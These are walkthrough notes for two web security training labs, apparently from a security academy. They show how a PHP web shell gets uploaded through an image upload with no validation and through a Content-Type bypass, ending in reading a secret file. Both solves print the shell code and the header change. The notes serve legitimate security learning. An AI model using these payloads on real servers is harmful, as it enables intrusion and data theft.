## Lab: Remote code execution via web shell upload
This lab contains a vulnerable image upload function. It doesn't perform any validation on the files users upload before storing them on the server's filesystem. To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file `/home/carlos/secret`. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: `wiener:peter`

### Solve:
1. go to `my account`, login
2. try to upload a normal file, and open the file in new tab, theres the slug for the upload directory `/files/avatars/[filename]`
3. make a php file with the content `<?php echo file_get_contents('/home/carlos/secret'); ?>`
4. upload the file, then access `/files/avatars/[filename].php`
5. it will show the content of the secret key, in this case `M8jTL5gn9sFv4uVgjP8eudxU3PDulHEq`
6. submit the code
7. the lab is solved

## Lab: Web shell upload via Content-Type restriction bypass
This lab contains a vulnerable image upload function. It attempts to prevent users from uploading unexpected file types, but relies on checking user-controllable input to verify this. To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file `/home/carlos/secret`. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: `wiener:peter`

### Solve:
1. go to `my account`, login
2. try to upload a normal file, and open the file in new tab, theres the slug for the upload directory `/files/avatars/[filename]`
3. make a php file with the content `<?php echo file_get_contents('/home/carlos/secret'); ?>`
4. try to upload the file, there's an error pops `Sorry, file type text/php is not allowed Only image/jpeg and image/png are allowed Sorry`
5. try to re-upload but capture the request in burp
6. there is `Content-Type: text/php` change to `Content-Type: image/jpeg`
7. forward the request, its uploaded
8. then access `/files/avatars/[filename].php`
9. it will show the content of the secret key, in this case `M8jTL5gn9sFv4uVgjP8eudxU3PDulHEq`
10. submit the code
11. the lab is solved